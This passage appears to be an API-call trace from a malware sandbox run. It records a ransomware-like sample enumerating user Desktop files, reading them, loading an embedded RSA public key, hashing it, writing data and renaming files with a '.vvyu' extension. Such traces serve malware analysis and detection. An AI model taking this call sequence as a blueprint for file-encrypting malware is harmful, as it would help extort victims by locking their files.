(HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6a88 [0199.249] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0199.249] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6a70 [0199.249] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0199.249] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6ad0 [0199.249] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6a70 | out: hHeap=0x2c0000) returned 1 [0199.249] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6a70 [0199.249] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6a88 | out: hHeap=0x2c0000) returned 1 [0199.249] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0199.249] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0199.249] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0199.249] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0199.249] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7a40 [0199.249] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6a40 | out: hHeap=0x2c0000) returned 1 [0199.249] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6a40 [0199.249] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0199.249] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2adf8d8 [0199.249] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6aa0 | out: hHeap=0x2c0000) returned 1 [0199.249] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0199.249] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6ad0 | out: hHeap=0x2c0000) returned 1 [0199.249] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af3f88 [0199.249] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0199.249] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0199.249] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0199.249] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0199.249] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6a40 | out: hHeap=0x2c0000) returned 1 [0199.250] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af41a0 [0199.250] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0199.250] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0199.250] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0199.250] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0199.251] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0199.251] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0199.251] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0199.252] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0199.252] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0199.253] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af41a0 | out: hHeap=0x2c0000) returned 1 [0199.253] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0199.253] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0199.253] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6a70 | out: hHeap=0x2c0000) returned 1 [0199.253] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0199.253] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6ab8 | out: hHeap=0x2c0000) returned 1 [0199.253] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0199.253] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6a58 | out: hHeap=0x2c0000) returned 1 [0199.253] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6a28 | out: hHeap=0x2c0000) returned 1 [0199.254] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0199.254] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0199.254] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0199.254] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6a10 | out: hHeap=0x2c0000) returned 1 [0199.255] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade818 | out: hHeap=0x2c0000) returned 1 [0199.255] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf8d8 | out: hHeap=0x2c0000) returned 1 [0199.255] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0199.256] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0199.256] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0199.256] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0199.256] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0199.256] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0199.256] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f90 | out: hHeap=0x2c0000) returned 1 [0199.257] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf6e0 | out: hHeap=0x2c0000) returned 1 [0199.257] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0199.258] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0199.258] WriteFile (in: hFile=0x584, lpBuffer=0x2af7168*, nNumberOfBytesToWrite=0x4d27, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af7168*, lpNumberOfBytesWritten=0x2f9fb14*=0x4d27, lpOverlapped=0x0) returned 1 [0199.259] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af7168 | out: hHeap=0x2c0000) returned 1 [0199.259] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x4d2c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0199.259] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0199.260] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0199.260] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ee78 [0199.260] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2adf6e0 [0199.260] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2adf6e0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0199.260] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af3f88 [0199.261] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf6e0 | out: hHeap=0x2c0000) returned 1 [0199.261] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ee78 | out: hHeap=0x2c0000) returned 1 [0199.261] WriteFile (in: hFile=0x584, lpBuffer=0x2af3f88*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af3f88*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0199.262] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0199.262] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0199.262] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0199.262] CloseHandle (hObject=0x584) returned 1 [0199.264] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x33f3b0 [0199.264] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8b0) returned 0x2af3f88 [0199.265] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33f3b0 | out: hHeap=0x2c0000) returned 1 [0199.265] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\YnPBSI277\\5Ctq03jfOkJI397\\_dSq\\oUopEVgNwd1-z0KJB.bmp" (normalized: "c:\\users\\keecfmwgj\\desktop\\ynpbsi277\\5ctq03jfokji397\\_dsq\\ouopevgnwd1-z0kjb.bmp"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\YnPBSI277\\5Ctq03jfOkJI397\\_dSq\\oUopEVgNwd1-z0KJB.bmp.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\ynpbsi277\\5ctq03jfokji397\\_dsq\\ouopevgnwd1-z0kjb.bmp.vvyu")) returned 1 [0199.266] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0199.267] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0199.267] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0199.269] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a245f0 | out: hHeap=0x2c0000) returned 1 [0199.269] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x60610f60, ftCreationTime.dwHighDateTime=0x1d89857, ftLastAccessTime.dwLowDateTime=0x509713a0, ftLastAccessTime.dwHighDateTime=0x1d89919, ftLastWriteTime.dwLowDateTime=0x509713a0, ftLastWriteTime.dwHighDateTime=0x1d89919, nFileSizeHigh=0x0, nFileSizeLow=0x9f0b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Q2aCngA1p.mp3", cAlternateFileName="Q2ACNG~1.MP3")) returned 1 [0199.269] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0199.270] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xbe) returned 0x2a245f0 [0199.270] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0199.272] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\YnPBSI277\\5Ctq03jfOkJI397\\_dSq\\Q2aCngA1p.mp3") returned=".mp3" [0199.272] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\YnPBSI277\\5Ctq03jfOkJI397\\_dSq\\Q2aCngA1p.mp3" (normalized: "c:\\users\\keecfmwgj\\desktop\\ynpbsi277\\5ctq03jfokji397\\_dsq\\q2acnga1p.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0199.272] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=40715) returned 1 [0199.272] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0199.276] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x9ee5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0199.276] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0199.278] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0199.278] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0199.278] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0199.278] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x9f0b, lpOverlapped=0x0) returned 1 [0199.279] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0199.279] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0199.279] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0199.279] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0199.279] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b6c8) returned 1 [0199.280] CryptCreateHash (in: hProv=0x31b6c8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0199.280] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0199.280] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0199.280] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0199.280] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0199.280] GetLastError () returned 0x0 [0199.280] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0199.280] CryptReleaseContext (hProv=0x31b6c8, dwFlags=0x0) returned 1 [0199.281] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0199.281] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0199.281] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0199.281] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0199.281] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0199.281] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0199.281] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0199.281] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9f10) returned 0x2af7168 [0199.281] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0199.282] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0199.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0199.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0199.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adf6e0 [0199.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f90 [0199.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ade818 [0199.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6a10 [0199.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ade860 [0199.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6a28 [0199.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6a58 [0199.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6ab8 [0199.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6a70 [0199.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0199.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0199.282] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aedfa0 [0199.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af3f88 [0199.282] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6a58 | out: hHeap=0x2c0000) returned 1 [0199.282] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6a70 | out: hHeap=0x2c0000) returned 1 [0199.282] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6ab8 | out: hHeap=0x2c0000) returned 1 [0199.283] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0199.283] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0199.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6ab8 [0199.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e30 [0199.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6a70 [0199.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0199.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae6a58 [0199.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e40 [0199.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0199.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0199.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0199.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0199.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0199.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ae8 [0199.284] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0199.284] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0199.284] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6a70 | out: hHeap=0x2c0000) returned 1 [0199.284] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0199.284] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6a58 | out: hHeap=0x2c0000) returned 1 [0199.284] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0199.284] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0199.284] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6ab8 | out: hHeap=0x2c0000) returned 1 [0199.285] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0199.285] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f90 | out: hHeap=0x2c0000) returned 1 [0199.285] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aedfa0 | out: hHeap=0x2c0000) returned 1 [0199.285] GetCurrentThreadId () returned 0x5d8 [0199.285] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0199.285] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2af5b10 [0199.286] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42548 [0199.286] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0199.286] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0199.286] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0199.286] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0199.286] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0199.286] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0199.286] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0199.286] GetCurrentThreadId () returned 0x5d8 [0199.286] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0199.287] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0199.287] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0199.287] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0199.287] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0199.287] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0199.288] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0199.288] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0199.288] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0199.288] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0199.288] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40478 [0199.288] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0199.288] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0199.288] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0199.288] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6ab8 [0199.288] HeapFree 